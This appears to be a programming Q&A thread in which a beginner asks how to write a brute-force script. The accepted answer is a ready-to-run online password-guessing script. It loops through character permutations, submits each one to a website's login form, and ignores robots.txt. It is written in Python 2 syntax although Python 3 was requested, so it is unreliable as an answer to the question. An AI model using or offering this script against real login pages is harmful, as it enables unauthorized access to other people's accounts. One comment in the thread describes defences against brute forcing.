# Python bruteforce script

Tags: python-3.x

I need help with writing a Python 3 brute force script. I recently just started teaching myself Python, and wanted to also take some ethical hacking courses. I just wanted to ask if anyone knows how to make a bruteforce script in Python 3. Thank you :)

Comment: My suggestion would be to learn more Python first.  A brute force attack is nothing more than trying all possible combinations of something.  For example, if you are looking for a 3 digit password, you would try 000, then 001, then 002, and so forth to 999.  Once you learn enough basic programming, you could do that.  Minimum length passwords and login delays are pretty good at making brute force impractical.

Answer (score 0, accepted):

try these script

```
#!/usr/bin/python
import mechanize 
import itertools

br = mechanize.Browser()
br.set_handle_equiv(True)
br.set_handle_redirect(True)
br.set_handle_referer(True)
br.set_handle_robots(False)

combos = itertools.permutations("i3^4hUP-",8) 
br.open("http://www.example.com/login/")
for x in combos:    
    br.select_form( nr = 0 )
    br.form['userName'] = "user name"
    br.form['password'] = ''.join(x)
    print "Checking ",br.form['password']
    response=br.submit()
    if response.geturl()=="http://www.example.com/redirected_to_url":
        #url to which the page is redirected after login
        print "Correct password is ",''.join(x)
        break
```

Answer (score 2):

The [for loop](https://wiki.python.org/moin/ForLoop) is quite a good bruteforce script